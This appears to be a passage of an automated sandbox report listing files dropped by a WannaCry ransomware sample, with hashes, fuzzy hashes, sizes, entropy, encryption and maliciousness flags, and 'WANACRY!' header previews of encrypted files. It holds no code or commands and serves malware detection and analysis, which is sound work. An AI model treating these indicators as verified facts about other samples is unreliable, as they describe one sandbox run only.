                                                  SHA-256:B51FA46879721C7238DFCBDD2522780367C330875C8FB1CF00151D1C792D115C
                                                  SHA-512:866DF352D46F9FAD398A6883F3C8BE18375ECE3BEC8FB29E9E93F782D36928211D690F55FFFEA67D20786A10AD4B2579BD3CBE2064CBC142949E8F0427AC32FE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4552
                                                  Entropy (8bit):7.954529835159166
                                                  Encrypted:false
                                                  SSDEEP:96:o2zb3zgrBG8Pcw5ZPOymIpoFo68l9y02j1cnYIgAtp/4mfP8J:3DgwEzPOT268f258DgAtp/40PU
                                                  MD5:FE562D00DBDCC07521317B634727524C
                                                  SHA1:EC558031F991A30F4E8BF407DB46A2CD10DCE2C6
                                                  SHA-256:3F88E34C2B4F6749EA6A3E6D6F9D0D91651D04E2A9445194EFBD19A9870C9591
                                                  SHA-512:A590E688C4E9A77F63458617759393D18007955747EEDE2C3294A4B62C5658102B6EC866B854FD3C69E9346453068E1BFAC989130ACBD02FB0EEB2B8CAADD7C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):277304
                                                  Entropy (8bit):7.999290034469061
                                                  Encrypted:true
                                                  SSDEEP:6144:qz3fqepKhhVKR2mRFzCX/YRPGFWgfI6cMom3AQ:qz3fqeshhER2mzXxgfmm3AQ
                                                  MD5:A6E6D9A17297C4411585E766BA818F1B
                                                  SHA1:5E687B2167BE9D775310D394FA2AB3A6EF8449E8
                                                  SHA-256:318317CC17E423E1C249FE01F28EBDD2641B8F0E9E9E7A84A99DD343873FD56D
                                                  SHA-512:3C85C72F2809053D6B51526CFFD12ED87E455029EB5EFC95AE2514BF37277272E89134898D8142BB4FBC86A1CC90778C23B07F6DF816B7C39F849AC10E9792B4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):27000
                                                  Entropy (8bit):7.993109225418807
                                                  Encrypted:true
                                                  SSDEEP:768:qO9/vxTYkamH8Rw6va2NwUla+aFuZHECnMO5PRzHD1:qOzTEFv3PLHTnMcPRLD1
                                                  MD5:0CFF5466F813801FE669108FC88EFA6B
                                                  SHA1:DCDC816AB4BC7D5A543667B56B723461552BF557
                                                  SHA-256:A48413FE07FA9F6F5009446FE9556B2FEEC7C4084E16ADDF8895E43E824A53AB
                                                  SHA-512:44124DEEA29D6AFCB8B0A10D22C82A506EA6B6BC901643F7EB3FA208F97290881888452E27B0C3605CCD4B793C55BA69FE0F3A87296939A96D825B40CB78118D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):164584
                                                  Entropy (8bit):7.998869873581819
                                                  Encrypted:true
                                                  SSDEEP:3072:ftz8wvDzxxhwYrMVN7kx0CCpwY7zC6BTgc+4enneMhegPL2YV12K:WGDzxvXrYixmpwATg4yvhJT2YV12K
                                                  MD5:304FE6BFADB9A351FF1102B5FA0EC1E4
                                                  SHA1:7F42E1495C522BE9DFDC3B2340DBAF51F3818F04
                                                  SHA-256:4D496F0A0489557C0B9089E890BAE80E26AC460A9571D2C780F02E0BC271CF21
                                                  SHA-512:1E4DBF633371FB5693BBA4ED50BDF3ECAAB4C775CE28EA86374616DE9FED043B6BFE1EB00291F0C2A1FDF0D435312B5D8125EE9C7991CFEEC9CF560CEF2EB4F2
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24904
                                                  Entropy (8bit):7.993469822656297
                                                  Encrypted:true
                                                  SSDEEP:768:Dd7c7w8l6WGw2KjoFtVbov69BGeGjaF2I:Dd7Po2So1boi9BdiYL
                                                  MD5:89E4BF8294B2C04B94D73D82783147E8
                                                  SHA1:CA9F8F445DF01B85250071761628F0D80C0DD437
                                                  SHA-256:6BEFE0B9479BB464650226DD30EADFDF4806AE88E224F418D971DBF2CD7A68AD
                                                  SHA-512:3438DB876FF6C2E6F682235EC4F7C8DDF045219CA2CF9C92B3CFD65DB01921D6C14E21C98E1C38FEF3E12FB8479558773220153DAF6EC86CEF7FB83F215BE815
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):690472
                                                  Entropy (8bit):7.999708855093496
                                                  Encrypted:true
                                                  SSDEEP:12288:xKIdDmmA7Xc23KltAZ66ggEkDrRgUp4QnQy2509cBYnyQiJlXv:xKItmqlqf9DFgn09SYyvJZv
                                                  MD5:26252CA5C0E8985BFFCD718988E40BEC
                                                  SHA1:0EEDEFC9EC1B5026B88C80AC854B2A4BF7819911
                                                  SHA-256:D2CBDC183BD6F7826FB5A13C52B425E3F0AFF9AE9492E6EB66000F87ACAC06F2
                                                  SHA-512:529B1A92271C4D4DFFF03E1412E6499E1F190D4848F009341215D79F294144289A7E344AF7CA0F92EC7F0E761E0F782DC90C9223FE61DB3F3F7D85427F627A96
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1816
                                                  Entropy (8bit):7.877670034236576
                                                  Encrypted:false
                                                  SSDEEP:48:bkSbFEVV24XZgd/r9MkliTsDEXAuANSPEoSyCxvNExvSHGI:oUOnXqj9MkliTq7SPET3HExvSHz
                                                  MD5:CF2B9581C8B2D6D0FAC71AD2D0273B94
                                                  SHA1:425DFE9798E84082EC33A78230D50AC05015C005
                                                  SHA-256:082C7578A170B9AB67CE4122AA766A84731AD19F74E76256CFD7C98E48AEC163
                                                  SHA-512:1B63B6441B029BEE5F12841EA316642A03F284D13964CF61C75F7F2C76EC0B8C2506F896651F0D00DCCD477FF5357685AB779046CB43924239A73BA9451EFA2B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):115848
                                                  Entropy (8bit):7.998377237649061
                                                  Encrypted:true
                                                  SSDEEP:3072:/LxCI8stKMTkZukqheYKd5siQf1lu4b734:DII8OKikZchexONv34
                                                  MD5:F75786242A504A40893E782E6643B1F7
                                                  SHA1:F74E6AF967D91498F384776374A151DC8A2D03BE
                                                  SHA-256:534E3B91E2C7DA290B00C5A22ACAE707C4672940A1248F4DF9101FD3512022AC
                                                  SHA-512:051E7BE4F3235B71E710B402C3771E4A0489262EB3BE39FB6F5D749E7015B621EB51B313B146DBE108CE584BF93E9D05889FC10291D2BE7731DC274150C87682
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):115848
                                                  Entropy (8bit):7.9984923407272985
                                                  Encrypted:true
                                                  SSDEEP:3072:auuAksAy+Jgyb1tkKZt54BcR058Uc9l/+k:duAZ+2ybDko/XU8V
                                                  MD5:F5A48721DD66A6309CABD22A481BBACD
                                                  SHA1:4F948975567E1EAADAB6089036BEAD3131A4E2D6
                                                  SHA-256:972BB75BA461D62E1CADC5BCFE4CA1AA551D75D0EA11784C3BABBAE62FBBCEB0
                                                  SHA-512:E36A847965C5BEDBCDBF9ABE93D85EB2652597F79B5F962A742BC8E5A2CCC442980FCA5FB3699BC34F323B4E3A666123FC0A0D2F6918F33ACA11F8BE1DAD0BDC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998476469829722
                                                  Encrypted:true
                                                  SSDEEP:3072:WnfhCZPPsa8w/JeAIqATAV0NqCZb3AQqX5Qa:ofhCBsaFxeAbV0NfMQ65Qa
                                                  MD5:50AE92137338BBA0C8C01F3468D9E1FE
                                                  SHA1:09029EE3578D9317970EB9F4BAD75260CAC5ADCB
                                                  SHA-256:22B9EDC632747B3FF2B36042DB966A3D3C94000EF5BB744AE9FF0D209E6802AD
                                                  SHA-512:2E01E82D1C5709E780235F0B48A14CDEBECF54DA3FDF7E2AFE32665FDDDCECC0D270875FDDB52CA166AAA114009C1B5964F61566AB1C2363782772043B95D450
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998572049377344
                                                  Encrypted:true
                                                  SSDEEP:1536:COWfWK4H/+Pd5HRymYJOD9RbI4jF0Mq+OqcQDuxpyJGiV1Wl0Q97VTCI8z:CuWPddRYcjIeiL9rYGE1Wlt7CV
                                                  MD5:592D2F7DC8904EDCE4DEE2EEB6018B6D
                                                  SHA1:99D1908BF39F9508AD3F7B6C85FAB3951428CC7F
                                                  SHA-256:EEF24852772FE3DBD906272D80F4DFACFAD6B8D5DC59A41D50D0391188026FAD
                                                  SHA-512:ACE6349F81040077214ABEEE05A216B863D76B6408C4E2CFCE898F7D946404AEDCCF2A4640D751B24B81A315534F129D31574E6F89A98C66FAE32DB7BE84DA30
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):273704
                                                  Entropy (8bit):7.999362519832665
                                                  Encrypted:true
                                                  SSDEEP:6144:3Bs7ILBWC8/DEwXB4VvstQPyKqaYqb67acjRsx4g2X+VoK:xHLBkDIfEqm7T85VoK
                                                  MD5:C03C51161BC64D1AA94D0CEFFA788DBF
                                                  SHA1:1BE5756F66A0CEDD7E8459D8FF57021837B32BC6
                                                  SHA-256:F92CCDC5E6FEB40D2B7451EAB1AF40AC15FEAE77F55A3FD568D8DEA14D8475A5
                                                  SHA-512:EE77AA618C0DB5842E8D605B22236376F4B4AE97986F3F02ED2F182D5E61BA7302205E0FD454BAF4E859154424BE8E4A8EE2532E5D81F9EE8E676DAD241D6FAD
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):246824
                                                  Entropy (8bit):7.999235805778599
                                                  Encrypted:true
                                                  SSDEEP:6144:Xevrkpy+mMR5tnqXH1wgiWG1sT/BAaQYs8efn+WTNN8W0uc:XevrkpzR5tnKT/yyaWWTNN8WO
                                                  MD5:9AFE1DC2940457CB891B665DC5524BA7
                                                  SHA1:570B87ED270AA694C6EF3FCC1A0D725B850FC514
                                                  SHA-256:0A21E8605BC9E26D5484DD905D4C47797590C42965E55BDF699E9E312AD03CD4
                                                  SHA-512:FB30E8E722141C36EDAB9F080B2300F2F81F1DDFD1A1C6CDA3886FD8A8953011F0E5103F0945740C7D8F545FA515D13B450613616E7A78F654A95893E96ACE03
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):394984
                                                  Entropy (8bit):7.999547824092546
                                                  Encrypted:true
                                                  SSDEEP:12288:kzXaBdvyuzLIjEERpf5R8DjT8Vllf5mXYBkCWbg:kzXij6D00TmIQ0
                                                  MD5:7651F27F5C508E1BA6164550A34DB967
                                                  SHA1:78EAECD1649554C9BADD234C6DC617B4C0470A4B
                                                  SHA-256:F3728037B254E5C8B30632D661F8ABFA87BFEBA37B2D1A2470D4D670088A6635
                                                  SHA-512:73977D984879E41C42F83977A2B02AC800B9934FAEF95A9950E1605EB8B9845AA6676BCF77305E953F519AC77FCE6B0D5544D7BAAECDFC49DD4AB21C0D3C8DF0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.861831447405634
                                                  Encrypted:false
                                                  SSDEEP:48:bkbEJdGBWcqVyPaQLIHygEGumf65VNWXXs:obEJdGkceK7hGQ53yc
                                                  MD5:A9F08CAF1D9DD16BD123B6A923E5610E
                                                  SHA1:02FD3CFAAC9A5E8BF81C5B69A4F1AE2EA12ED45C
                                                  SHA-256:F4244DF13DCF48C00E0A02D4A4E203FA47AE14EB12D37E0867B781C19B011767
                                                  SHA-512:3274FE1CD59BA1FFC5B3A9E668C3CBD567993BD37976A1002602525BB8F91CFE1885AC162896A31B5AC8A5EF4FA97CB336D6FF5B4BFA94606737234651B9C6C1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.856055905198148
                                                  Encrypted:false
                                                  SSDEEP:48:bkWU1AeexavrhuEEfCyWJdCnPo0JQQQc9pHeES:oWjeAYk9aTKQQQcjHE
                                                  MD5:857513D809629174C2581883E6FB6450
                                                  SHA1:2A94491A1EC2EC095D83B8436D6E39E1989156B3
                                                  SHA-256:D4333E8B1BF7270C4E91B0DFBE7315CF51CBD19EE065DECA49FBD171FEAF3781
                                                  SHA-512:A42A4D6E8AA0BEFA7F351C9EF8BC9F10CE6F7168963F0B2F4EADB51DCE7C6B0586BC171D066FFC7544AF18D007F8D8DEE2C01CAE330EC7AB400232452824D607
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.87972038682944
                                                  Encrypted:false
                                                  SSDEEP:48:bkpbJHhubwta5vnuNl7fHkqsnBAoYwurPZw:onKwta5/uNlLPsJdIO
                                                  MD5:96229D4DAEBE7CD8529A70ED1EEA64D1
                                                  SHA1:75CCB24BA69CDCFF68CEEBA5F596CC5DE217E35C
                                                  SHA-256:11102664BB6CDDD4BFE0FC64526E31B0DB4EACABC1044D9FE5E1467C6FE75F52
                                                  SHA-512:A94F70B9AA880070007812FB9E95C1D8124A095F40F62E099596ED4F81837A5463779AD3386B3295407D5E5148B5B00465485FE17C18CB9E2947D6553643B378
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1880
                                                  Entropy (8bit):7.886700788705434
                                                  Encrypted:false
                                                  SSDEEP:48:bkFc249t6/RSf1rvULFimyQ5Tk5NcjANnD:oFc2/S5cLLOmjQ
                                                  MD5:E7849A91BD3084C39A8F48D0085FB57A
                                                  SHA1:DA86FC6A1AF1C3251285503A7ADAFD449F596529
                                                  SHA-256:59ED471E43B81DAF37EB37BC09A8CB549E47830594C8DBBA5EB4754162C6D905
                                                  SHA-512:617A546DC1CC69AB9C0AEC381FE492BE64B4F34422793871CBE94A5774B5D683D598EEFE5E8052C50EE63AC1A62FC4044BE70455248741F6C0B97D1DFDA75BF2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1944
                                                  Entropy (8bit):7.891575439369692
                                                  Encrypted:false
                                                  SSDEEP:48:bkXJZMwaoDEiwdIsc78W7QZBJG5fsL+TU214KCY6k0Df/iF:o5ZMhoDzwdIMW0Z+5fe+TUVY6PDf/iF
                                                  MD5:0F46681101C54D75F113A62A1CAB298C
                                                  SHA1:564E37A5D39E12B3B42EC414E4543B7DDC5C2B3A
                                                  SHA-256:AB4568B7AD70D7AD3EFD09BA72F306E767AAA3085C5F5F32FB8696123BDE1BA6
                                                  SHA-512:6D0431F68D31AFDB015C11F3181CFDB779DE9BE93B48B457CA62EA8FD5C574EBF3F08ED359317F1DD35D07250F327FF825CEA5367F3CA259432CDCB0E6115AFA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.872312578087441
                                                  Encrypted:false
                                                  SSDEEP:48:bk8+v1+DId81fv8MvylWxl4TZLfUg2Br0:o8+N+DI2v62l4ZLfLSA
                                                  MD5:6B4D8042C164571BBFF370D3230F3357
                                                  SHA1:0822464120215F94376C52E4EEFC9E8F7493F587
                                                  SHA-256:B8FF8B18CFE041002A058CCE5BC09DBCDE097F33FCE2BCFEAC221AE173AC8C14
                                                  SHA-512:28C7F05C1AB77D9F6C76D782A3FD28C2D4D425BD103D8807999BC70FAA2BD668B65401E6B8A1BFF5E8451FB1473FA32092E73734C0C6203BAA2BF6E1DD25F70B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):352008
                                                  Entropy (8bit):7.999443577813371
                                                  Encrypted:true
                                                  SSDEEP:6144:5NNhIDmuHqItN6E2LbaY7LcY0UlrJPyHdi35z1pBEkABXCIJcf5fbj:5ODhHq8N6E0aYc0d6UpbBcjJ+F
                                                  MD5:600554237B50A462CDA07251FA11552B
                                                  SHA1:D4901F0E240548E2F7FDB16B4FE091275BEC9254
                                                  SHA-256:DE03E76B11C7C9F7904B9B342B69A369E4FDAE2CC92B658AEA0E3BE485DCDFEF
                                                  SHA-512:1AADA2C4ED526F5BFDD09325800348D51B49C910B829E5038ED920903D03AE275CC420A77D10955422C788BD8EF3ECC13CEBBCA802E5AE61CCEBF02BE25196AE
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):243784
                                                  Entropy (8bit):7.999279212841311
                                                  Encrypted:true
                                                  SSDEEP:6144:rW5Y82drj5y30OM6zKbXbti9EYXlLs9/4WuET4y/m32gOu:rWa8qrc3u6ohIPloH42m32g1
                                                  MD5:4ED02A856E11E67A95A8A5B1CB674C7C
                                                  SHA1:9A4127BED213906B845FEA489136738ADE2BF463
                                                  SHA-256:DA24EB646E000233AEDF406A80E87CF6940F92D689F2DE93B395CC74E38B39FC
                                                  SHA-512:C26AFD461808E0CBE0C2072FA886D800056DB5AC461BE7C4C8FA771D700AF22EDFCF000851C78E0C9BF37C1E4F88377694F254C2E5726A9CD4F8D37E56079748
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25192
                                                  Entropy (8bit):7.992575960635192
                                                  Encrypted:true
                                                  SSDEEP:384:luBo4Gay83W3BHocGqJffNowX7e3KJjxFULLDRWU25cBa5V7Qs6yXwsHQHbd9Z58:WLGQG3BrlJNow7xUPecBa5VHXzm76fuM
                                                  MD5:AA3B20898E69D0BBB0CC0D036FB984A9
                                                  SHA1:BECDD345F2D8CAEE2B1B825F8FFFB3633B88B1ED
                                                  SHA-256:AE9B4FA858EE57B0ECEA3EEF286DD269DC810F0464EB0AEB6D16A0014BD24B26
                                                  SHA-512:91504204389DE618B0F4879D51F3B41E1EE463913826E09146ECEE023E1E6E25866FAB24ED238C36B2E039839691ABAB088CCADD7CD76F2D48A0EA0C66D98F3A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25192
                                                  Entropy (8bit):7.993655517996397
                                                  Encrypted:true
                                                  SSDEEP:384:GQoNgVsIbhHFFA0fqxtSFYCSWjxz0c8rDM6Iaq5tregyu4jAlJ9v1UIyZSaC:LoysiLqwdzUvM6IaAtCAl3+Xg
                                                  MD5:E96E2364C51CFC4D6BA13ABAD2DD54E9
                                                  SHA1:EF4F2AA9E7398991751D86864873D2F93CF384C6
                                                  SHA-256:77A3F7069AF8329E61BE21ABA45DA76B8E74F3BAB8422A0ACD1561767CBF9055
                                                  SHA-512:E42DCE2A1BC0C2C2DF7CBA0F405A354BD4D03F312629D1773785AF9186F7EB7EBA907FA441DB494EE65ECC192E00B51885BE6AE18EA54360A9DCD69B5B427179
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):77560
                                                  Entropy (8bit):7.997642881789174
                                                  Encrypted:true
                                                  SSDEEP:1536:vhgEXgkVGtEx4ub4DLDzEt7qUpn3b1uKdPOnG7aT8x8THQFb7taTxm2+tNLU:JtkW4DHM3pn3YKdmnov8M+AU
                                                  MD5:779BF9E145CBDC4ADBD8D55998038D09
                                                  SHA1:7AE0BBC54262875A32EF7083DF316DA79BB90A77
                                                  SHA-256:A07ACADF2D82264D67489A906F4A88BF158FFF77D9E5DD1A6FF8463FBEF56099
                                                  SHA-512:F75E945EE3C3CA3DF8663214472AA9BFA568FE059F952D9841E888D4DCE965A1A500A7EA83B11E688996B9ECA54A65BFE306385F459FBCA113E92DE8BBD850CB
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.995360489278638
                                                  Encrypted:true
                                                  SSDEEP:768:mjgK6vmISu6FKeFaO7fAm8eHdg0d0HBAaZYNkUVoK20AGNlohn/Is:S56v96xNDAm8eHdgC0HLGqTK20JN2h/J
                                                  MD5:B17E17C57A30A5DB340CE8CCF77FF260
                                                  SHA1:836B0815496E755BD359A50AE7C6B25F2A3A2C82
                                                  SHA-256:1EA859E344F2F80395591B35522A74E3AD48BCCD2DC264962C2BF4EFFC391204
                                                  SHA-512:0D6E95564DC321847F36BAD896A28AD847C6C054B202F721C4173FDD66F1B8C008D8F76E843553912D84DECD3194782EBE4CDAAF40833AAA77CF1E45EF29A9C4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.994866349290046
                                                  Encrypted:true
                                                  SSDEEP:768:UP07JS+WpTGwCFSMz1ZTq4Hjh0U/U1gcfRxXUid6LWj9GRcAxgqgmWF+h4g:4Wh95xRZ/MhxKy56cAxgqAF+h4g
                                                  MD5:6725664808B500996AD01097968D9EFA
                                                  SHA1:9C03C6D447016D05380823B860B06C5C3677EBB5
                                                  SHA-256:C9B1D8FFB20BE451531ED6E71EA68F7E02DFFD9844A95591F0C691A4D59B2C57
                                                  SHA-512:1284671E71D771A2577E04C9178D13835638E58378DDE9965D96DA808BCEB0D73BB591BD2B7B582701E1834AAEFDE76008ADC178E492948699D0079274048EEF
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.995291944460258
                                                  Encrypted:true
                                                  SSDEEP:768:K9Iduya5ghwyO5H8Sm9ItP7ThYgDePODTVIg1iOFGl:YIMghwpyKtD1zDMOlhiOFo
                                                  MD5:414C38FC49425AA5CFC59EED77BA3BAA
                                                  SHA1:004848566D9A798036E65C1207E1F2EE12726C5A
                                                  SHA-256:6DBD82544E19C834E2A1596BAA5270C2AEF818BDFF315AB6250E45C70E07766F
                                                  SHA-512:01AEE161FB9581C8AA516AD85B5EE99BD916DDF48E881F65B5A8ED96039FA06537CB8F3F66074FCF0DEAAF3411AB532F65A05AE6626F2693E2418610F1345CA8
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1426184
                                                  Entropy (8bit):7.999872830469767
                                                  Encrypted:true
                                                  SSDEEP:24576:nGK6jJ5LsCw9+muSrvE4O1FhxScg5LRh070Ii59qNW+fmaVnq71WVcsvEZCD1OhL:GK6jAC4TjveiNBRh07s59qN1fmqnq71Z
                                                  MD5:73D409807E07B9F78D372B3F1ACBA0A3
                                                  SHA1:00013C43E940E6064DB7A2189CCBA46E4EEB9560
                                                  SHA-256:54FEB3A4BCA0EDB25A3B4D126EFCC4D9DA1DFFB68BF1B2729EB8EFE955091883
                                                  SHA-512:371B005C1F3F2F296A49C5B42870FDF4DDF0E08AC5751F1E598B7E28890C2B7283943C59E2337A15F912A1F1040EBE23BACC98BDB439F0F50B78056242003CB8
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):533032
                                                  Entropy (8bit):7.999698359614149
                                                  Encrypted:true
                                                  SSDEEP:12288:UsRzd9qlwrL0uMPw5rP/r12HB0h2rzwSJkn9zeGrdsy62:Xzp4ZIVwHB0h2rM3njss
                                                  MD5:4DEC3D670ADEFE009000488A6DFEFC99
                                                  SHA1:796DCE1B46826AEDCF697424079F594A204FFA14
                                                  SHA-256:EA8D22C66444A1CBAD225BA947F04B20834DCD233906CDCB2991C45BDF9F2450
                                                  SHA-512:CA285EA26560BEE08903696D3B592E6E28EDFB13CD12401BFD35EF4FE8F355DEBD3298841F0EC77FA7810B8F3AB6997C438530556F701277232E6A0CA76270EC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):41416
                                                  Entropy (8bit):7.996067559068154
                                                  Encrypted:true
                                                  SSDEEP:768:XRyNSpZtDNtfGkZIxntFUv/z9ApegKPVXiwIcVb/6yFfjlePX/G1dK2QYPW:nZ9NtfktWBAwJPVXiVcR6ypMPXWKMO
                                                  MD5:DC7BECE225AF85ACC679C465C641B118
                                                  SHA1:49760470B92961FE13E8D9C2FC428798561D4C2B
                                                  SHA-256:B51BB7EA6A5B484486C3BE2B76F34BE8C4961DC16E398319BBACEB0BB0511CB2
                                                  SHA-512:917B26BEC6D02E4C12AE6286BE2E6BB27FCFCAE54C69BEB685FFC5BE7419E402179990E87C8B0D7BBBB7FFE677027C033FE6465487E531F360451051EFEC44D9
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):104008
                                                  Entropy (8bit):7.998294966174257
                                                  Encrypted:true
                                                  SSDEEP:3072:M4xNlwX3ktPOy0Hk65fo1Tul1BauOivx+G2pLgMPlV:MgNlwX0MnEEgybauOiJQpLPlV
                                                  MD5:0411E63884263162ED0BB6FCB6EBE6FA
                                                  SHA1:3EA982158ABA9002B67DB2FBEF56DC1F16E3DC97
                                                  SHA-256:40764A2C4BBD2DCA53D102CB4AE65EB74248FA593CD62CE257D6DFECB40488AE
                                                  SHA-512:22B9532A4767E62DE26C02683C6FC54FC977EB68685C52D4D270F6431C99A3CD9077E8B99BDE296004D0793DAAC4C97994578421494FF2C8E0DE00213805CAD6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):214008
                                                  Entropy (8bit):7.999254386291626
                                                  Encrypted:true
                                                  SSDEEP:3072:plzujDX1cfM7lUcbrStuXtWbaHhO5Zo0nnia4AwHtMXdKTDLx2CQde5:CjDX1cU75rSt4ceHcHia4ThnECd5
                                                  MD5:4A2F90B0A9AFD0230332501F225E0D52
                                                  SHA1:37C89AF34D6A963DED8A323F6AC6B8B333987CB3
                                                  SHA-256:4E4051B15B4080CE2E314CEFFF67CD4DA778FDCE102580FD7ED00C7D08419219
                                                  SHA-512:3A529D2EE9EFA12FB900AA7A2641296391F96294CE1D5823A0A77AC373750A9C1C5E94FF89AF648829155B61EA229357292094DF2594678AE48FEB9C854E5712
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):214008
                                                  Entropy (8bit):7.999152563242
                                                  Encrypted:true
                                                  SSDEEP:6144:80lBSOwDjyN3vOg8A73bgaAskCoeVLl6+3JbTObf2wdnCcr:FbwveZhr1oeFl6+5+
                                                  MD5:1DBF0AEB41734B9A40EE561E4EBC3E9E
                                                  SHA1:D641B18E7800772BBA1D53BECB9477E15E4A0987
                                                  SHA-256:6B73C5C07F8676E5F6F55132F728C732E3510BB62A5DA5A847A062DE7AAF36B7
                                                  SHA-512:F0287B3DFA3E102FEA52BF402D1D6C1DBBA60DC6834EE56FFECE54C1AC9C6589450F3E28B5A28EBD527FAEA43828E61299B302E0480101D234B8AF12DBA84B9F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
